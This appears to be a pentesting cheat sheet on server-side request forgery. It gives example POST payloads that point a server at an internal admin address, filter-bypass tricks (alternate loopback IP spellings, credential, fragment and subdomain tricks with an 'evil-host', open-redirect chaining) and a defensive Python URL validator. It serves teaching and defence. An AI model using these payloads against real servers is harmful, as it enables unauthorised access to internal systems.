Server-side request forgery (SSRF)

In computer security, server-side request forgery (SSRF) is a type of exploit where an attacker abuses the functionality of a server causing it to access or manipulate information in the realm of that server that would otherwise not be directly accessible to the attacker.

-- Wikipedia

SSRF attacks against the server itself

When a web app accepts a URL in a request (e.g. the URL of a product), you may be able to change that URL arbitrarily and thereby make the server fetch the resource you chose. As the request is issued by the server itself, you may be able to reach resources that are unreachable from outside.

POST /some/url HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

someParam=http://192.168.0.42/admin

Bypass filter

Blocklists

  • Using an alternate IP representation of 127.0.0.1, such as 2130706433 (decimal) or 017700000001 (octal).

  • Registering your own domain that resolves to 127.0.0.1.

  • Using (double) URL encoding or case variations.

Allowlists

  • Using embedded credentials: https://expected-host@evil-host

  • Using fragments: https://evil-host#expected-host

  • Leveraging the DNS naming hierarchy with a domain you control: https://expected-host.evil-host

  • Combinations of all of the above techniques.
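The blocklist and allowlist bypasses above all exploit validators that look at the raw URL string instead of the host the server will actually connect to. The following added example (not from the original page) contrasts such weak checks with a parser-based one: it parses the URL, extracts the effective hostname (which drops the userinfo, fragment and anything after the host), rejects literal IPs in every legacy inet_aton() spelling (decimal, octal, hex, short forms), and only then compares the hostname against an exact allowlist. `ALLOWED_HOSTS` and `expected-host` are constructed values.

```python
import ipaddress
import re
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"expected-host"}  # constructed allowlist for the example


def naive_allowlist_check(url: str) -> bool:
    """Weak: substring match on the raw string; defeated by user@host, #fragment, sub.domain."""
    return "expected-host" in url


def naive_blocklist_check(url: str) -> bool:
    """Weak: blocks only the literal dotted-quad spelling of loopback."""
    return "127.0.0.1" not in url and "localhost" not in url


def _parse_inet_aton(host: str):
    """Return an IPv4Address if host is any legacy inet_aton() form (a, a.b, a.b.c, a.b.c.d
    with decimal, leading-0 octal or 0x hex parts), else None. Implemented here rather than
    via socket.inet_aton so the behaviour does not depend on the platform's libc."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    nums = []
    for p in parts:
        if not re.fullmatch(r"0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*", p):
            return None
        nums.append(int(p, 16) if p[:2].lower() == "0x" else int(p, 8) if p[0] == "0" else int(p))
    *lead, last = nums  # the last part fills all remaining bytes (so "2130706433" is 127.0.0.1)
    if any(n > 255 for n in lead) or last >= 256 ** (4 - len(lead)):
        return None
    value = 0
    for n in lead:
        value = (value << 8) | n
    return ipaddress.IPv4Address((value << (8 * (4 - len(lead)))) | last)


def hardened_check(url: str) -> bool:
    """Decide on the parsed, effective host only. Literal IPs in any spelling are rejected
    outright; a hostname must match the allowlist exactly. The caller must still resolve
    the name and re-check the resulting IP at connect time (attacker-controlled DNS)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname  # userinfo, port, path, query and fragment are already stripped
    if not host:
        return False
    ip = _parse_inet_aton(host)
    if ip is None:
        try:
            ip = ipaddress.ip_address(host)  # catches IPv6 literals such as ::1 as well
        except ValueError:
            ip = None
    return ip is None and host in ALLOWED_HOSTS
```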

Via open redirect vulnerability

If you find an open redirect vulnerability in the target application, you may be able to bypass the filter with it: the supplied URL points at the (allowed) redirect endpoint, which then sends the server on to the internal target.

POST /some/url HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 50

someParam=/some/url?path=http://192.168.0.42/admin

Blind SSRF

Blind SSRF is detected most reliably using out-of-band (OAST) techniques, e.g. with Burp Collaborator.

For example, a URL supplied in the Referer header that the server subsequently requests itself.
